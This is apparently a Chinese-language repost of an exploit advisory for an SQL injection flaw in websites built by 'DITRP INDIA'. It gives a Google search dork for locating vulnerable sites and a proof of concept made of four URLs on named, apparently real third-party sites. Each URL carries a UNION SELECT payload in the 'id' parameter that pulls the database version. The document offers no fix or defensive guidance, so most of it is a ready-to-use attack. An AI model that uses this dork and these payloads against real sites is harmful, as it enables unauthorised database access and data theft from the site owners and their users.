
本文详细分析了DITRP INDIA网站存在的SQL注入漏洞,包含漏洞发现过程、利用方法和测试环境,通过具体的PoC演示了如何利用该漏洞获取数据库版本信息。
#漏洞标题: DITRP INDIA - SQL注入
#日期: 2025-08-09
#漏洞作者: Behrouz Mansoori
#Google搜索关键词: "designed by : DITRP INDIA"
#分类: web应用
#测试环境: Windows, edge
概念验证:
演示:
https://dishapunjab.com/page.php?page=BlogDetails&id=3%27%20union%20select%201,version(),3,4,5,6,7,8,9,10--+
https://aarushcomputer.com/page.php?page=BlogDetails&id=3%27%20union%20select%201,version(),3,4,5,6,7,8,9,10--+
https://onlineworldinstitute.in/page.php?page=BlogDetails&id=3%27%20union%20select%201,version(),3,4,5,6,7,8,9,10--+
https://www.kirancomputers.co.in/page.php?page=BlogDetails&id=3%27%20union%20select%201,version(),3,4,5,6,7,8,9,10--+




